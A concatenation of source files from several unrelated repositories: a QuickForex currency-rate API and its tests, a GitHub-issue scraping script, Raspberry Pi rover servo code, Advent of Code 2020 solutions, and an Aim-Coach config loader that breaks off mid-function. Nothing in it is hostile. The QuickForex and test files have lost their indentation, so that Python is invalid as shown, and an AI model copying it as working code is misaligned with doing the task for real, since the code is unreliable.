def _create_provider(**kwargs) -> ProviderBase:
if "provider_id" in kwargs:
settings_overrides = {
field: value for field, value in kwargs.items() if field != "provider_id"
}
settings_overrides = settings_overrides if len(settings_overrides) > 0 else None
return providers_factory.create_provider(
provider_id=kwargs["provider_id"], settings_overrides=settings_overrides
)
elif "provider" in kwargs:
return kwargs["provider"]
return _provider()
class Api(object):
def __init__(self, **kwargs):
"""QuickForex API.
Examples:
api = Api()
# Use the provider available by default (this is what you want in most cases)
api = Api(provider_id="exchangerate.host", source="ecb")
# Use a provider instance created from its identifier (and optional provider-specific settings overrides)
api = Api(provider=existing_provider_instance)
# Use a specific provider instance
:param kwargs: Either:
- provider (existing provider instance) argument
- provider_id as well as any additional provider-specific settings
- No argument (use the default provider)
"""
self._provider = _create_provider(**kwargs)
def get_latest_rate(self, *currency_pair_args: CurrencyPairType) -> Decimal:
"""Retrieve the last available rate for the given currency pair
Examples:
api.get_latest_rate("EUR/USD")
api.get_latest_rate("EUR", "USD")
api.get_latest_rate(("EUR", "USD"))
api.get_latest_rate(CurrencyPair("EUR", "USD"))
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Single str argument "<domestic:3><foreign:3>": "EURUSD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:return: Last exchange rate for the provided currency pair.
"""
return self._provider.get_latest_rate(
currency_pair=parse_currency_pair_args(*currency_pair_args)
)
def get_latest_rates(
self, *currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType]
) -> dict[CurrencyPair, Decimal]:
"""Retrieve the last available rate for each given currency pair
Examples:
api.get_latest_rates("EUR/USD", "EUR/GBP")
api.get_latest_rates("EURUSD", "BTC/USDT")
api.get_latest_rates(("EUR", "USD"), ("EUR", "GBP"))
api.get_latest_rates(CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP"))
api.get_latest_rates({CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")})
api.get_latest_rates([CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")])
api.get_latest_rates([CurrencyPair("EUR", "USD"), ("EUR", "GBP")])
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:return: Last exchange rate for each provided currency pair.
"""
return self._provider.get_latest_rates(
currency_pairs=parse_currency_pairs_args(*currency_pairs_args)
)
def get_historical_rate(
self, *currency_pair_args: CurrencyPairType, as_of: date
) -> Decimal:
"""Retrieve the exchange rate for the given currency pair at a given historical date.
Examples:
api.get_historical_rate("EUR/USD", as_of=date(year=2021, month=1, day=1))
api.get_historical_rate("EURUSD", as_of=date(year=2021, month=1, day=1))
api.get_historical_rate("EUR", "USD", as_of=date(year=2021, month=1, day=1))
api.get_historical_rate(("EUR", "USD"), as_of=date(year=2021, month=1, day=1))
api.get_historical_rate(CurrencyPair("EUR", "USD"), as_of=date(year=2021, month=1, day=1))
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Single str argument "<domestic:3><foreign:3>": "EURUSD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:param as_of: Historical date
:return: Historical exchange rate for the provided currency pair.
"""
return self._provider.get_historical_rate(
currency_pair=parse_currency_pair_args(*currency_pair_args), as_of=as_of
)
def get_historical_rates(
self,
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
as_of: date
) -> dict[CurrencyPair, Decimal]:
"""Retrieve the exchange rate for the given currency pair at a given historical date.
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:param as_of: Historical date
:return: Historical exchange rate for each provided currency pair.
"""
return self._provider.get_historical_rates(
currency_pairs=parse_currency_pairs_args(*currency_pairs_args), as_of=as_of
)
def get_rates_time_series(
self,
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
**date_range_kwargs: Union[DateRange, date]
) -> dict[CurrencyPair, dict[date, Decimal]]:
"""Retrieve the historical rates for one or more currency pairs between two dates.
Examples:
api.get_rates_time_series(
"EUR/USD",
start_date=date(year=2020, month=1, day=1),
end_date=date(year=2021, month=1, day=1)
)
api.get_rates_time_series(
"EUR/USD", "EURUSD"
start_date=date(year=2020, month=1, day=1),
end_date=date(year=2021, month=1, day=1)
)
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:param date_range_kwargs: Date range, can be either:
- Single 'date_range' (type: quickforex.DateRange) argument
- Both 'start_date' (type: datetime.date) and 'end_date' (type: datetime.date) arguments
:return: Historical exchange rate for each provided currency pair for the provided date range.
"""
return self._provider.get_rates_time_series(
currency_pairs=parse_currency_pairs_args(*currency_pairs_args),
date_range=parse_date_range_kwargs(**date_range_kwargs),
)
@property
def provider_metadata(self) -> ProviderMetadata:
return ProviderMetadata.from_provider_type(self._provider)
def get_latest_rate(*currency_pair_args: CurrencyPairType) -> Decimal:
"""Retrieve the last available rate for the given currency pair
Examples:
quickforex.get_latest_rate("EUR/USD")
quickforex.get_latest_rate("EUR", "USD")
quickforex.get_latest_rate(("EUR", "USD"))
quickforex.get_latest_rate(CurrencyPair("EUR", "USD"))
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Single str argument "<domestic:3><foreign:3>": "EURUSD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:return: Last exchange rate for the provided currency pair.
"""
return Api().get_latest_rate(*currency_pair_args)
def get_latest_rates(
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType]
) -> dict[CurrencyPair, Decimal]:
"""Retrieve the last available rate for each given currency pair
Examples:
quickforex.get_latest_rates("EUR/USD", "EUR/GBP")
quickforex.get_latest_rates("EURUSD", "BTC/USDT")
quickforex.get_latest_rates(("EUR", "USD"), ("EUR", "GBP"))
quickforex.get_latest_rates(CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP"))
quickforex.get_latest_rates({CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")})
quickforex.get_latest_rates([CurrencyPair("EUR", "USD"), CurrencyPair("EUR", "GBP")])
quickforex.get_latest_rates([CurrencyPair("EUR", "USD"), ("EUR", "GBP")])
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument type.
:return: Last exchange rate for each provided currency pair.
"""
return Api().get_latest_rates(*currency_pairs_args)
def get_historical_rate(*currency_pair_args: CurrencyPairType, as_of: date) -> Decimal:
"""Retrieve the last available rate for the given currency pair
:param currency_pair_args: Currency pair in either format:
- Single str argument "<domestic>/<foreign>": "EUR/USD"
- Two str arguments "<domestic>", "<foreign>": "EUR", "USD"
- Single tuple[str, str] argument ("<domestic>", "<foreign>"): ("EUR", "USD")
- Single quickforex.CurrencyPair argument: quickforex.CurrencyPair("EUR", "USD")
:param as_of: Historical date
:return: Historical exchange rate for the provided currency pair.
"""
return Api().get_historical_rate(*currency_pair_args, as_of=as_of)
def get_historical_rates(
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
as_of: date
) -> dict[CurrencyPair, Decimal]:
"""
:param currency_pairs_args:
:param as_of: Historical date
:return: Historical exchange rate for each provided currency pair.
"""
return Api().get_historical_rates(*currency_pairs_args, as_of=as_of)
def get_rates_time_series(
*currency_pairs_args: Union[Iterable[CurrencyPairType], CurrencyPairType],
**date_range_kwargs: Union[DateRange, date]
) -> dict[CurrencyPair, dict[date, Decimal]]:
"""Retrieve the historical rates for one or more currency pairs between two dates.
:param currency_pairs_args: List of currency pairs. Each individual argument can be:
- str "<domestic>/<foreign>": "EUR/USD"
- str "<domestic:3><foreign:3>": "EURUSD"
- tuple[str, str] ("<domestic>", "<foreign>"): ("EUR", "USD")
- quickforex.CurrencyPair: quickforex.CurrencyPair("EUR", "USD")
- An iterable (list, set) with any of the previous argument types.
:param date_range_kwargs: Date range, can either be:
- Single 'date_range' (type: quickforex.DateRange) argument
- Both 'start_date' (type: datetime.date) and 'end_date' (type: datetime.date) arguments
:return: Historical exchange rate for each provided currency pair for the provided date range.
"""
return Api().get_rates_time_series(*currency_pairs_args, **date_range_kwargs)
def install_provider(provider: ProviderBase) -> None:
"""Install an alternative provider to query foreign exchange rates. Note that calling this function is not needed
to use the QuickForex API because a provider is installed by default.
:param provider: Installed provider.
"""
global _INSTALLED_PROVIDER
_INSTALLED_PROVIDER = provider
def install_provider_with_id(
provider_id: str, settings_overrides: Optional[dict[str, Any]] = None
) -> None:
"""Install an alternative provider to query foreign exchange rates. Note that calling this function is not needed
to use the QuickForex API because a provider is installed by default.
Examples:
quickforex.install_provider_with_id("exchangerate.host", decimal_places=8)
:param provider_id: Installed provider.
:param settings_overrides: Additional settings passed to the chosen provider.
"""
install_provider(
providers_factory.create_provider(
provider_id=provider_id, settings_overrides=settings_overrides
)
)
def get_installed_provider() -> ProviderBase:
"""Retrieve the provider instance currently in use.
:return: Currently installed provider
"""
return _INSTALLED_PROVIDER
def get_default_provider_type() -> Type[ProviderBase]:
"""Retrieve the type of provider used by default.
:return: Type of provider used by default
"""
return _DEFAULT_PROVIDER
```
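A short sketch of how the module-level helpers above are typically called; the pair strings and dates are illustrative, and the top-level import assumes the package re-exports these helpers:
```python
from datetime import date

import quickforex  # assumed to re-export the module-level helpers above

rate = quickforex.get_latest_rate("EUR/USD")
historical = quickforex.get_historical_rate("EUR", "USD", as_of=date(2021, 1, 1))
series = quickforex.get_rates_time_series(
    "EUR/USD",
    start_date=date(2021, 1, 1),
    end_date=date(2021, 1, 31),
)
```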
#### File: tests/unit/test_domain.py
```python
from datetime import date, timedelta
import pytest
from quickforex.domain import CurrencyPair, DateRange
today = date.today()
yesterday = today - timedelta(days=1)
def test_construct_currency_pair():
currency_pair = CurrencyPair("EUR", "USD")
assert currency_pair.domestic == "EUR"
assert currency_pair.foreign == "USD"
@pytest.mark.parametrize(
"bad_args",
[
(),
("EUR",),
("EUR", "USD", "GBP"),
("EUR", None),
(None, "GBP"),
("JPY", ""),
("", "JPY"),
("EUR", 1),
(1, "GBP"),
],
)
def test_construct_currency_pair_bad_inputs(bad_args):
with pytest.raises((ValueError, TypeError)):
CurrencyPair(*bad_args)
def test_reverse_currency_pair():
currency_pair = CurrencyPair("EUR", "USD").reversed()
assert currency_pair.domestic == "USD"
assert currency_pair.foreign == "EUR"
@pytest.mark.parametrize(
"pair_str,expected",
[
("EURUSD", CurrencyPair("EUR", "USD")),
("JPY/GBP", CurrencyPair("JPY", "GBP")),
("BTC/USDT", CurrencyPair("BTC", "USDT")),
],
)
def test_parse_currency_pair(pair_str: str, expected: CurrencyPair):
assert CurrencyPair.parse(pair_str) == expected
@pytest.mark.parametrize(
"bad_pair_str", ["", "EUR", "EURUS", "EUR/USD/BTC", "GBP/", "EUR//USD"]
)
def test_parse_currency_pair_bad_inputs(bad_pair_str):
with pytest.raises(ValueError):
CurrencyPair.parse(bad_pair_str)
@pytest.mark.parametrize(
"start_date,end_date",
[(yesterday, today), (today, today + timedelta(days=365)), (today, today)],
)
def test_construct_date_range(start_date: date, end_date: date):
date_range = DateRange(start_date, end_date)
assert date_range.start_date == start_date
assert date_range.end_date == end_date
@pytest.mark.parametrize(
"bad_args", [(), (today,), (today, yesterday), (yesterday, today, today)]
)
def test_construct_date_range_bad_inputs(bad_args):
with pytest.raises((ValueError, TypeError)):
DateRange(*bad_args)
@pytest.mark.parametrize(
"date_range",
[
DateRange(
start_date=date(year=2021, month=1, day=1),
end_date=date(year=2021, month=12, day=31),
),
DateRange(start_date=today, end_date=today),
DateRange(start_date=yesterday, end_date=today),
],
)
def test_iter_date_range(date_range: DateRange):
all_dates = list(dt for dt in date_range)
assert len(all_dates) == (date_range.end_date - date_range.start_date).days + 1
for i in range(len(all_dates) - 1):
assert all_dates[i] + timedelta(days=1) == all_dates[i + 1]
```
|
{
"source": "jeanetteclark/metadig-checks",
"score": 3
}
|
#### File: metadig-checks/code/getIssueNameLabelList.py
```python
import re
import requests
def findUseCase(labels):
FAIR = ['Findable','Accessible','Interoperable','Reusable']
for useCase in FAIR:
if useCase in labels:
return useCase
return 'None'
def findLevel(labels):
levels = ['Essential','Supporting']
for level in levels:
if level in labels:
return level
return 'None'
owner = 'NCEAS'
repository = 'metadig-checks'
maxIssuePage = 12
checkNames = []
for page in range(1, maxIssuePage):
url = 'https://api.github.com/repos/' + owner + '/' + repository
url += '/issues?page=' + str(page)
r = requests.get(url)
#
# loop through the issues for each page
#
for issue in r.json():
#
# select issues where names contain just upper or lower case
# letters and "."
# Create list of tokens: ['issueNumber','title','milestone',
# labels (comma separated, name tokens (tab separated))]
#
        if re.match(r'^[A-Za-z.]*$', issue['title']):
tokenList = [str(issue['number'])]
tokenList.append(issue['title'])
if issue['milestone'] is not None:
if issue['milestone']['title'] is not None:
tokenList.append(issue['milestone']['title'])
else:
tokenList.append('')
labelList = list([label['name'] for label in issue['labels'] if 'name' in label])
tokenList.append(labelList)
#
# add issue to big list
#
checkNames.append(tokenList)
with open('metaDIGIssueData.txt', 'w') as output:
print('ID\tTitle\tMilestone\tLabels\tUseCase\tLevel\tt1\tt2\tt3\tt4\tt5\tt6\tt7', file=output)
for check in checkNames:
#
# fill empty name tokens for better pivot table display (no (blank))
#
nameTokens = check[1].replace(".", '\t')
tokenCount = len(nameTokens.split('\t'))
while tokenCount < 7:
nameTokens += '\t '
tokenCount += 1
print("%s\t%s\t%s\t%s\t%s\t%s\t%s" %
(check[0], check[1], check[2],
','.join(check[3]), findUseCase(check[3]),
findLevel(check[3]), nameTokens), file=output)
print('metaDIGIssueData.txt created')
```
|
{
"source": "JeanetteMueller/OpenPerseverance",
"score": 3
}
|
#### File: software/rover/arm.py
```python
from __future__ import division
import socket
import json
import time
import math
from time import sleep
import Adafruit_PCA9685
from Communication import Communication
from Helper import Helper
from DRV8825 import DRV8825
import RPi.GPIO as GPIO
com = Communication("arm")
sock = com.getSocket()
sock.bind((com.ip, com.getPortForArm()))
#### Servo
pwm = Adafruit_PCA9685.PCA9685(address=0x40)
servo_min = 150.0 # Min pulse length out of 4096
servo_max = 650.0 # Max pulse length out of 4096
pwm.set_pwm_freq(60)
def gotMessage(data):
jsonData = json.loads(data)
if "arm" in jsonData:
arm = jsonData["arm"]
helper = Helper()
if "1" in arm:
pwm.set_pwm(4, 0, int(helper.getPulseFromAngle(arm["1"], servo_min, servo_max)))
if "2" in arm:
pwm.set_pwm(5, 0, int(helper.getPulseFromAngle(arm["2"], servo_min, servo_max)))
if "3" in arm:
pwm.set_pwm(6, 0, int(helper.getPulseFromAngle(arm["3"], servo_min, servo_max)))
if "4" in arm:
pwm.set_pwm(7, 0, int(helper.getPulseFromAngle(arm["4"], servo_min, servo_max)))
while True:
data, addr = sock.recvfrom(com.udpBuffer)
print("received message: %s" % data)
gotMessage(data)
```
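The listener above consumes UDP datagrams carrying JSON of the form `{"arm": {...}}`, where keys "1" through "4" hold servo angles in degrees. A hedged sender sketch — the address and port are placeholders, since the real values come from `Communication`:
```python
import json
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
message = {"arm": {"1": 90, "2": 45, "3": 120, "4": 10}}
# The address and port below are assumptions; Communication.getPortForArm() provides the real port.
sock.sendto(json.dumps(message).encode(), ("192.168.0.42", 5005))
```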
#### File: software/rover/Helper.py
```python
class Helper:
    def findI2C(self):
        # List the devices on the I2C bus by shelling out to i2cdetect
        # (equivalent to running "i2cdetect -y 1" in a terminal).
        import subprocess
        subprocess.run(["i2cdetect", "-y", "1"])
def getPulseFromAngle(self, angle, servo_min, servo_max):
#print("Helper getPulseFromAngle angle: %f - %f - %f" % (angle, servo_min, servo_max))
maxRange = servo_max - servo_min
#print("Helper getPulseFromAngle maxRange: %f" % maxRange)
partAngle = (angle * 1.0) / 180
#print("Helper getPulseFromAngle partAngle: %f" % partAngle)
angleMultiply = partAngle * maxRange
#print("Helper getPulseFromAngle angleMultiply: %f" % angleMultiply)
pulse = angleMultiply + servo_min
#print("Helper getPulseFromAngle: %f" % pulse)
return pulse
```
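`getPulseFromAngle` linearly maps an angle in [0, 180] degrees onto the pulse range [servo_min, servo_max]; a quick sanity check of the arithmetic:
```python
from Helper import Helper

helper = Helper()
# 90 degrees is the midpoint of the range: (90 / 180) * (650 - 150) + 150 = 400
assert helper.getPulseFromAngle(90, 150.0, 650.0) == 400.0
assert helper.getPulseFromAngle(0, 150.0, 650.0) == 150.0
assert helper.getPulseFromAngle(180, 150.0, 650.0) == 650.0
```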
#### File: software/rover/MotorDriver.py
```python
MotorDriverDirection = [
'forward',
'backward',
]
class MotorDriver():
def __init__(self):
self.PWMA = 0
self.AIN1 = 1
self.AIN2 = 2
self.PWMB = 5
self.BIN1 = 3
self.BIN2 = 4
def MotorRun(self, pwm, motor, index, speed):
if speed > 100:
return
if(motor == 0):
pwm.setDutycycle(self.PWMA, speed)
if(index == MotorDriverDirection[0]):
pwm.setLevel(self.AIN1, 0)
pwm.setLevel(self.AIN2, 1)
else:
pwm.setLevel(self.AIN1, 1)
pwm.setLevel(self.AIN2, 0)
else:
pwm.setDutycycle(self.PWMB, speed)
if(index == MotorDriverDirection[0]):
pwm.setLevel(self.BIN1, 0)
pwm.setLevel(self.BIN2, 1)
else:
pwm.setLevel(self.BIN1, 1)
pwm.setLevel(self.BIN2, 0)
def MotorStop(self, pwm, motor):
if (motor == 0):
pwm.setDutycycle(self.PWMA, 0)
else:
pwm.setDutycycle(self.PWMB, 0)
```
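`MotorRun` expects a PWM controller object exposing `setDutycycle(channel, percent)` and `setLevel(channel, value)`. A hedged usage sketch — the `PCA9685` wrapper below is an assumption modelled on typical motor-HAT examples, not a module shipped with this repository:
```python
from PCA9685 import PCA9685  # hypothetical wrapper exposing setDutycycle/setLevel

pwm = PCA9685(0x40, debug=False)
pwm.setPWMFreq(50)

driver = MotorDriver()
driver.MotorRun(pwm, motor=0, index='forward', speed=60)  # motor A forward at 60% duty
driver.MotorStop(pwm, motor=0)
```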
#### File: software/rover/steer.py
```python
from __future__ import division
from threading import Thread
import sys
import socket
import json
import time
import math
from time import sleep
import Adafruit_PCA9685
from Communication import Communication
from Communicator import Communicator
from Helper import Helper
com = Communication("steer")
sock = com.getSocket()
sock.bind((com.ip, com.getPortForSteer()))
#### Servo
pwm = Adafruit_PCA9685.PCA9685(address=0x40)
servo_min = 150.0 # Min pulse length out of 4096
servo_max = 650.0 # Max pulse length out of 4096
pwm.set_pwm_freq(60)
class SteerReactor(Thread):
helper = Helper()
steerFrontLeft = 85
steerFrontRight = 85
steerBackLeft = 85
steerBackRight = 85
def __init__(self):
Thread.__init__(self)
self.daemon = True
self.start()
def run(self):
while True:
pwm.set_pwm(0, 0, int(self.helper.getPulseFromAngle(self.steerFrontLeft, servo_min, servo_max)))
pwm.set_pwm(4, 0, int(self.helper.getPulseFromAngle(self.steerFrontRight, servo_min, servo_max)))
pwm.set_pwm(8, 0, int(self.helper.getPulseFromAngle(self.steerBackLeft, servo_min, servo_max)))
pwm.set_pwm(12, 0, int(self.helper.getPulseFromAngle(self.steerBackRight, servo_min, servo_max)))
sleep(0.02)
def parseMessage(self,msg):
jsonData = json.loads(msg)
if "steer" in jsonData:
steer = jsonData["steer"]
if "fl" in steer:
if "fr" in steer:
if "bl" in steer:
if "br" in steer:
self.steerFrontLeft = steer["fl"]
self.steerFrontRight = steer["fr"]
self.steerBackLeft = steer["bl"]
self.steerBackRight = steer["br"]
runner = SteerReactor()
Communicator(sock, runner)
while True:
pass
```
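Like the arm process, the steering listener reads UDP JSON; `parseMessage` only applies an update when all four wheel angles ("fl", "fr", "bl", "br") are present. A hedged sender sketch with placeholder address and port:
```python
import json
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
message = {"steer": {"fl": 70, "fr": 70, "bl": 100, "br": 100}}  # angles in degrees; 85 is neutral
sock.sendto(json.dumps(message).encode(), ("192.168.0.42", 5006))  # address/port are assumptions
```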
|
{
"source": "jeaneudesAyilo/new-hands-on-2021",
"score": 2
}
|
#### File: app/apps/app_detection.py
```python
import base64
import cv2
import io
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import PIL
import plotly.express as px
import sys
import tensorflow as tf
import yaml
from dash.dependencies import Input,State, Output
from PIL import Image
sys.path.insert(1, "C:/Users/jeane/Documents/new-hands-on-2021/notebooks/yolov3")
from configs import *
import yolov4
from yolov4 import Create_Yolo
from utils import load_yolo_weights, detect_image
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights("C:/Users/jeane/Documents/new-hands-on-2021/notebooks/checkpoints/yolov3_custom")
def fig_to_uri(in_fig, close_all=True, **save_args):
# type: (plt.Figure) -> str
"""
Save a figure as a URI
:param in_fig:
:return:
"""
out_img = io.BytesIO()
in_fig.savefig(out_img, format='png', **save_args)
if close_all:
in_fig.clf()
plt.close('all')
out_img.seek(0) # rewind file
    encoded = base64.b64encode(out_img.read()).decode("ascii").replace("\n", "")
return "data:image/png;base64,{}".format(encoded)
from app import app
layout = html.Div([
html.Hr(),
dbc.Toast(
[html.P(" ", className="mb-0")],
header="DETECTION DES PANNEAUX DE SIGNALISATION",
style={
"text-align": "center",
"background-color": ""
},
),
dcc.Upload(
id='bouton-chargement_2',
children=html.Div([
'Cliquer-déposer ou ',
html.A('sélectionner une image')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center',
'margin': '10px',
'margin' : '10px 10px 50px 300px'
}
),
html.Div(id='detection',children =[]),
dcc.Link("Aller à l'app de reconnaisance", href='/apps/recognition'),html.Br(),
dcc.Link("Accueil", href='/apps/home')
])
@app.callback(Output('detection', 'children'),
[Input("bouton-chargement_2",'contents'),
])
def display_detection(contents):
    if contents is not None:
content_type, content_string = contents.split(',')
image = detect_image(yolo, image_path = content_string,type_image_path = "base64_string", output_path = "", input_size=YOLO_INPUT_SIZE, show=False, CLASSES=TRAIN_CLASSES, rectangle_colors=(255,0,0))
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
fig, ax = plt.subplots(1,1,figsize=(10,6))
ax.imshow(image)
ax.axis('off')
plt.imshow(image)
out_url = fig_to_uri(fig)
return html.Div([
html.Hr(),
html.Img(src = out_url),dcc.Markdown('''**prohibitory = [0, 1, 2, 3, 4, 5, 7, 8, 9, 10, 15, 16]**
0: 'Speed limit (20km/h)' ;
1: 'Speed limit (30km/h)' ;
2: 'Speed limit (50km/h)' ;
3: 'Speed limit (60km/h)' ;
4: 'Speed limit (70km/h)' ;
5: 'Speed limit (80km/h)' ;
7: 'Speed limit (100km/h)' ;
8: 'Speed limit (120km/h)' ;
9: 'No passing' ;
10: 'No passing veh over 3.5 tons' ;
15: 'No vehicles' ;
16: 'Veh > 3.5 tons prohibited'
**mandatory = [33, 34, 35, 36, 37, 38, 39, 40]**
33: 'Turn right ahead' ;
34: 'Turn left ahead' ;
35: 'Ahead only' ;
36: 'Go straight or right' ;
37: 'Go straight or left' ;
38: 'Keep right' ;
39: 'Keep left' ;
40: 'Roundabout mandatory'
**danger = [11, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31]**
11: 'Right-of-way at intersection' ;
18: 'General caution' ;
19: 'Dangerous curve left' ;
20: 'Dangerous curve right' ;
21: 'Double curve' ;
22: 'Bumpy road' ;
23: 'Slippery road' ;
24: 'Road narrows on the right' ;
25: 'Road work' ;
26: 'Traffic signals' ;
27: 'Pedestrians' ;
28: 'Children crossing' ;
29: 'Bicycles crossing' ;
30: 'Beware of ice/snow' ;
31: 'Wild animals crossing'
**other = [6,12,13,14,17,32,41,42]**
6: 'End of speed limit (80km/h)' ;
12: 'Priority road' ;
13: 'Yield' ;
14: 'Stop' ;
17: 'No entry' ;
32: 'End speed + passing limits' ;
41: 'End of no passing' ;
42: 'End no passing veh > 3.5 tons'
''')])
else :
return
```
|
{
"source": "JeanExtreme002/Advent-of-Code",
"score": 4
}
|
#### File: 2020/day-10/solution.py
```python
def connect_adapters(adapters):
"""
Connect all adapters and return the device's built-in joltage adapter rating and all differences found.
"""
differences = [0, 0, 1]
current_adapter = 0
# Organize the list.
adapters.sort()
for index in range(len(adapters)):
# Get the difference between the current adapter and the next adapter.
difference = get_difference(current_adapter, adapters[index])
if not difference: return
differences[difference - 1] += 1
current_adapter = adapters[index]
return current_adapter + 3, differences
def get_difference(first_adapter, second_adapter):
"""
If the connection between the adapters is valid, the joltage difference is returned.
"""
difference = second_adapter - first_adapter
return difference if difference in [1, 2, 3] else None
# Get data from file.
with open("input.txt") as file:
data = [int(line) for line in file.readlines()]
# Get the device's built-in joltage adapter rating and all the differences found.
adapter, differences = connect_adapters(data)
first_part_result = differences[0] * differences[-1]
print("First Part:", first_part_result)
```
#### File: 2020/day-3/solution.py
```python
def get_count(array, value, step_x = 1, step_y = 1):
"""
Return the number of times a value appears in a matrix.
"""
x, count = 0, 0
# Get the size of the list.
height, width = len(array), len(array[0])
# Go through each row of the array.
for y in range(0, height, step_y):
# Check whether the value has been found.
if data[y][x] == value: count += 1
x += step_x
# Check if the X is greater than the width. If so, the width
# will be subtracted from the X to continue the walk.
if x >= width: x -= width
return count
# Get data from file.
with open("input.txt") as file:
data = [line.strip() for line in file.readlines()]
slopes = ((1, 1), (3, 1), (5, 1), (7, 1), (1, 2))
final_result = 1
# Go through each slope to get the tree count.
for right, down in slopes:
# Get the tree count and multiply the final result by it.
count = get_count(data, "#", right, down)
final_result *= count
# Show the result of the current slope.
print("Slope [{}, {}] = {} trees found.".format(right, down, count))
# Show the final result (second part).
print("Final Result:", final_result)
```
#### File: 2020/day-6/solution.py
```python
def get_chars(from_ = "a", to = "z"):
"""
Return a list of characters.
"""
return [chr(i) for i in range(ord(from_), ord(to) + 1)]
def get_answers_count(group):
"""
Return the number of answers for each question (a-z).
"""
answers_count = []
for char in get_chars():
# Get the number of times the character appears in the string.
answers_count.append(group.count(char))
# Return answers count.
return answers_count
def get_people_count(group):
"""
Return the number of people in a group.
"""
# Separate people from the group.
people = group.split("\n")
if "" in people: people.remove("")
# Return people count.
return len(people)
def get_questions_count(group):
"""
Return the number of questions answered.
"""
questions_count = 0
for char in get_chars():
# Check whether the character is in the string.
if char in group: questions_count += 1
# Return questions count.
return questions_count
# Get data from file.
with open("input.txt") as file:
data = file.read().split("\n\n")
first_part_count = 0
second_part_count = 0
# Get questions count from each group.
for group in data:
# Get answers count for each question.
answers_count = get_answers_count(group)
# Get people count.
people_count = get_people_count(group)
# Compute the number of questions answered.
first_part_count += get_questions_count(group)
# Compute the number of questions that everyone answered.
for number in answers_count:
if number == people_count: second_part_count += 1
# Show the results.
print("First Part: The sum of questions answered is {}.".format(first_part_count))
print("Second Part: The sum of questions that everyone answered is {}.".format(second_part_count))
```
|
{
"source": "JeanExtreme002/Aim-Coach",
"score": 3
}
|
#### File: JeanExtreme002/Aim-Coach/app.py
```python
from classes.App import App
from PIL.ImageColor import getrgb
import json
def setConfig():
"""
    Function to create or load the program settings from a .json file.
"""
filename = "config.json"
indent = 4
    # Dictionary with the program's default settings.
default_config = {
"Colors":{
"Final_scoreboard_background_color":App.FINAL_SCOREBOARD_BACKGROUND_COLOR,
"Scoreboard_color":App.SCOREBOARD_COLOR,
"Target_colors":App.TARGET_COLORS,
"Target_area_colors":App.TARGET_AREA_COLORS
},
"Extra difficulty settings":{
"Lives":App.LIVES,
"Missing_shots_decreases_life":App.MISSING_SHOTS_DECREASES_LIFE,
},
"Performance":{
"Frames_per_second":App.FRAMES_PER_SECOND,
"Sounds_buffer":App.SOUNDS_BUFFER
},
"Targets":{
"Target_limit_per_second":App.TARGET_LIMIT_PER_SECOND,
"Target_radius":App.TARGET_RADIUS,
"Targets_per_second":App.TARGETS_PER_SECOND,
"Target_speed":App.TARGET_SPEED
},
}
    # Create a dictionary from the default settings, to be updated with the file's values.
file_config = default_config.copy()
try:
file = open(filename)
config = json.loads(file.read())
file.close()
for mainKey in config.keys():
            # Check whether the main key is allowed.
if not mainKey in default_config.keys():
continue
for key in config[mainKey].keys():
                # Check whether the key is allowed.
